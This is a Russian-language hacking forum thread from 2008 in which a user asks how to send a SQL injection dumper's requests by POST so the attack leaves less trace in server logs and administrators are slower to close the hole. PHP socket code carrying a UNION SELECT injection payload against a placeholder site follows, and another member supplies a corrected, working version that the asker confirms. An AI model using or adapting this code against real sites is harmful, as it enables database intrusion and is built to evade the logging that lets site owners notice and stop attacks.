ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
10.07.2008, 20:16
|
|
Постоянный
Регистрация: 20.12.2007
Сообщений: 334
Провел на форуме:
1934122
Репутация:
118
|
|
Convert GET => POST?
Все доброе время суток.
Как можно реализовать на php конвертацию GET'a в POST метод. Нужно это для дампера SQLinj, а то палится гет хорошо в логах и админ быстро закрывает бреш в системе. Если кто подскажет, буду благодарен.
|
|
|
10.07.2008, 20:19
|
|
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021
Репутация:
676
|
|
|
|
|
|
10.07.2008, 20:23
|
|
Постоянный
Регистрация: 20.12.2007
Сообщений: 334
Провел на форуме:
1934122
Репутация:
118
|
|
Благодарю, Респект тебе и Маднету  |
|
|
|
12.07.2008, 00:54
|
|
Постоянный
Регистрация: 20.12.2007
Сообщений: 334
Провел на форуме:
1934122
Репутация:
118
|
|
PHP код:
<?php
$fsoc = fsockopen("site.com", 80);
$req = "POST /bag.asp HTTP/1.0\r\n";
$req .= "Connection: keep-alive\r\n";
$req .= "Content-Length: 45\r\n";
$req .= "Content-Type: text/html\r\n";
$req .= "Host: site.com\r\n";
$req .= "User-Agent: Opera/9.24 (Windows NT 5.1; U; eng)\r\n";
$req .= "\r\n";
$req .= "page=-11+union+select+1,2,3--\r\n";
fwrite($fsoc, $req );
while (!feof($fsoc))
echo fread($fsoc,102400);
fclose($fsoc);
?>
Данный код, работает не корректно. Выводит страницу с ошибкой, но результат инъекции не выводит, в чем ошибка?
Последний раз редактировалось shellz[21h]; 12.07.2008 в 01:05..
|
|
|
|
12.07.2008, 02:06
|
|
Познавший АНТИЧАТ
Регистрация: 30.04.2007
Сообщений: 1,206
Провел на форуме:
4778940
Репутация:
1257
|
|
$req .= "Content-Length: 45\r\n";
cc чего ты взял что тут
page=-11+union+select+1,2,3--
45 символов?
|
|
|
|
12.07.2008, 03:25
|
|
Постоянный
Регистрация: 20.12.2007
Сообщений: 334
Провел на форуме:
1934122
Репутация:
118
|
|
cc чего ты взял что тут
45 символов?
нет, это я примеру написал. Может ктонить привести аналогичный код, но только чтоб работал.
|
|
|
|
12.07.2008, 04:33
|
|
Reservists Of Antichat - Level 6
Регистрация: 16.07.2005
Сообщений: 653
Провел на форуме:
8854279
Репутация:
2727
|
|
PHP код:
<?php
$host = 'site.com';
$url = fsockopen($host, 80);
$data_p = "page=-11+union+select+1,2,3--";
$req = "POST /bag.asp HTTP/1.0\r\n";
$req .= "Host: site.com\r\n";
$req .= "User-Agent: Opera/9.24 (Windows NT 5.1; U; eng)\r\n";
$req .= "Content-Type: application/x-www-form-urlencoded\r\n";
$req .= "Content-Length: ".strlen($data_p)."\r\n";
$req .= "Connection: Close\r\n\r\n";
$req .= $data_p;
fputs($url, $req);
while (!feof($url)) $s[] = fgets($url, 1028);
fclose($url);
print_r($s);
?>
__________________
ПИУ-ПИУ...
Последний раз редактировалось c411k; 12.07.2008 в 04:35..
|
|
|
|
12.07.2008, 05:06
|
|
Постоянный
Регистрация: 20.12.2007
Сообщений: 334
Провел на форуме:
1934122
Репутация:
118
|
|
c411k, спасибо большое, теперь работает на ура! вопрос больше не имею. |
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для shellz[21h]](/avatars/avatar46780.jpg?767774){kind=avatar}
![Отправить сообщение для shellz[21h] с помощью ICQ](fusion/misc/im_icq.gif)
![Аватар для shellz[21h]](/avatars/avatar46780.jpg?767784){kind=avatar}
![Аватар для shellz[21h]](/avatars/avatar46780.jpg?769514){kind=avatar}
![Аватар для shellz[21h]](/avatars/avatar46780.jpg?769656){kind=avatar}
![Аватар для shellz[21h]](/avatars/avatar46780.jpg?769711){kind=avatar}
Похожие темы
Линейный вид
